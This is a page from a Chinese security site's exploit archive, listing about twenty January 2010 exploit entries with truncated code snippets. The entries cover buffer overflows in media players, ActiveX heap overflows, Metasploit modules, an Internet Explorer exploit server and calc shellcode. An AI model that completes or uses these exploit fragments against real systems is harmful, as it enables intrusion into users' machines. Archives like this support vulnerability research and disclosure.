首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
IntelliTamper 2.07/2.08 (defer) Remote Buffer Overflow (meta)
  日期:2010-01-25 09:42:47 点击:100 评论:0
### $Id: IntelliTamper.rb##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http:/
DJ Legend local heap overflow proof of concept exploit that creates a malicious
  日期:2010-01-25 09:41:29 点击:37 评论:0
#!/usr/bin/perl# DJ Legend [.m3u / .pls File ] Local Heap Overflow Poc# www.djlegend.net/http://www.djlegend.net/# Found By : SkuLL-HacKeR# Msn : Wizard-skh@hotmail.commailto:Wizard-skh@hotmail.com####################################################
Invision Power Board remote file disclosure exploit
  日期:2010-01-25 09:38:40 点击:41 评论:0
#! /usr/bin/env python3.1################################################################ # _____ _____ ____ (validator.php) ## |_ _| __ | _ ## | | | |__) | |_) | ## | | | ___/| _ ## _| |_| | | |_) | ## |_____|_| |____/ ## @expl0it... ###########
Windows Live Messenger 2009 ActiveX Heap Overflow PoC
  日期:2010-01-22 11:50:52 点击:91 评论:0
#Aouther : [SarBoT511] ( xs3@hotmail.com ) #Exploits title :[Windows Live Messenger 2009 ActiveX Heap Overflow PoC] #tested on :[windows 7 Vista Xp sp3] #Windows Live Messenger SkyDrive 2009 html object classid='clsid:C2828995-4A83-4100-A212-3024BA1
IntelliTamper 2.07/2.08 (defer)Remote Buffer Overflow Poc
  日期:2010-01-22 11:50:14 点击:27 评论:0
# H0m3 : S3curity-art.com Google.com # M4!L : Wizard-skh@hotmail.commailto:Wizard-skh@hotmail.com My@hotmail.itmailto:My@hotmail.it # usage : perl xpl.pl xpl.html my $IntelliTamper_html ='htmlheadtitleSkuLL-HackeR Home World/title/headbody' . 'script
EFS Easy Chat server Universal BOF-SEH (Meta)
  日期:2010-01-22 11:49:42 点击:45 评论:0
## # $Id: ca_igateway_debug.rb 6568 2009-05-19 13:20:32Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more informat
jetAudio 8.0.0.2 Basic Local Crash Exploit
  日期:2010-01-22 11:48:55 点击:43 评论:0
#!/usr/bin/perl # Title: jetAudio 8.0.0.2 Basic Local Crash Exploit # Author: cr4wl3r # Platform: Windows ######################################### my $file= crash.asx; my $boom= http://.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit
  日期:2010-01-22 11:47:38 点击:39 评论:0
#!/usr/bin/perl # Title: jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit # Author: cr4wl3r cr4wl3r[!]linuxmail.org # Tested: Windows xp(sp2) ######################################### my $file=b00m.m3u; my $header = http://; my $junk = A x 1017;
Windows NT User Mode to Ring 0 Escalation Vulnerability
  日期:2010-01-21 10:26:21 点击:671 评论:0
Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack ------------------------------------------------------------------------- CVE-2010-0232 In order to support BIOS service routines in legacy 16bit applications, the Windows NT
Win32 Shellcode XP SP2 FR (calc) 19 bytes
  日期:2010-01-21 10:25:11 点击:82 评论:0
/* Author: SkuLL-HacKeR Big Thx To : my brothers : Pr0F.SELLiM - ThE X-HaCkEr - Jiko - My friends in Morocco H0ME : Geeksec.com No-exploiT Email : My@Hotmail.iT Wizard-skh@hotmail.com // Win32 Shellcode Collection (calc) 19 bytes // Shellcode Exec C
MP3 Studio v1.X (.m3u File) Local Stack Overflow (Universal)
  日期:2010-01-21 10:24:10 点击:36 评论:0
#!/usr/bin/perl # Exploit Title: MP3 Studio v1.X (.m3u File) Local Stack Overflow Universal # Date: 01/20/2010 # Author: D3V!L FUCKER # Software Link: http://www.freewarezoom.com/archives/millennium-mp3-studio # Version: 1.X # Tested on: Windows XP
AOL 9.5 ActiveX 0day Exploit (heap spray)
  日期:2010-01-21 10:23:44 点击:78 评论:0
html head titleAOL 9.5 ActiveX 0day Exploit (heap spray) /title ************************************** br[+] AOL 9.5 ActiveX 0day Exploit (heap spray)/br br[+] Author : Dz_attacker/br br[+] Tested on Windows Xp SP3 ,IE7/br **************************
Pidgin MSN <= 2.6.4 File Download Vulnerability
  日期:2010-01-21 10:22:47 点击:87 评论:0
#!/usr/bin/env python Pidgin MSN = 2.6.4 file download vulnerability 19 January 2010 Mathieu GASPARD ( gaspmat@gmail.com ) Description: Pidgin is a multi-protocol Instant Messenger. This is an exploit for the vulnerability[1] discovered in Pidgin by
RM Downloader .m3u BOF (SEH)
  日期:2010-01-21 10:22:15 点击:44 评论:0
#!/usr/bin/perl -w # Author: Jacky # Version: 3.0.2.1 # Tested on: Windows XP SP2 #RM Downloader m3u Buffer Overflow (SEH) (Perl Edition ) #Discovered by :: Peter Van Eeckhoutte ( VERY BIG GREETZ TO HIM ) ;-) #Written by Jacky #All Greetz for Peter
Mini-stream Ripper 3.0.1.1 (.smi) Local Buffer Overflow PoC
  日期:2010-01-21 10:20:05 点击:40 评论:0
#!/usr/bin/python # Tested on: win XPsp3 # webpage: d3b4g.info #EAX 00E1C880 #EDX 00000001 #EBX 41414141------------------------------------------------ #ESP 000D198C #EBP 00E1C880 controle over registers #ESI 41414141-------------------------------
Foxit Reader v3.1.4.1125 ActiveX Heap Overflow PoC
  日期:2010-01-21 10:19:31 点击:108 评论:0
#Vendor :www.foxitsoftware.com #tested on :[windows 7] #Foxit Reader Version 3.1.4.1125 html object classid='clsid:05563215-225C-45EB-BB34-AFA47217B1DE' id='target' /object script language='vbscript' targetFile = C:Program FilesFoxit SoftwareFoxi
Microsoft Windows Defender ActiveX Heap Overflow PoC
  日期:2010-01-21 10:17:55 点击:91 评论:0
#Exploits title :[Microsoft Windows Defender ActiveX Heap Overflow PoC] #tested on :[windows 7] #Microsoft Windows Defender html object classid='clsid:07DD3249-A591-4949-8F20-09CD347C69DC' id='target' /object script language='vbscript' targetFile =
Millenium MP3 Studio v1.X (.m3u File) Local Stack Overflow
  日期:2010-01-21 10:17:03 点击:41 评论:0
#!/usr/bin/perl # Exploit Title: MP3 Studio v1.X (.m3u File) Local Stack Overflow # Date: 19.01.2010 - 01/19/2010 # Author: NeoCortex # Software Link: http://www.freewarezoom.com/archives/millennium-mp3-studio # Version: 1.X # Tested on: Windows XP
AOL 9.5 ActiveX Heap Overflow Vulnerability
  日期:2010-01-21 10:06:28 点击:38 评论:0
Product: AOL 9.5 Vulnerability: ActiveX - Heap Overflow Discussion: Vulnerability is in Activex Control (CDDBControl.dll) Sending a string to BindToFile() , triggering the vulnerability. Successful exploitation allow remote attackers to execute arbi
This program acts as a web server that generates an exploit to target a vulnerab
  日期:2010-01-21 10:05:17 点击:30 评论:0
## Author : Ahmed Obied (ahmed.obied@gmail.com)# Modify by: syniack (syniack@hotmail.com)# This program acts as a web server that generates an exploit to # target a vulnerability (CVE-2010-0249) in Internet Explorer. # The exploit was tested using I
共637页/12733条记录 首页 上一页 [396] [397] [398] 399 [400] [401] [402] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved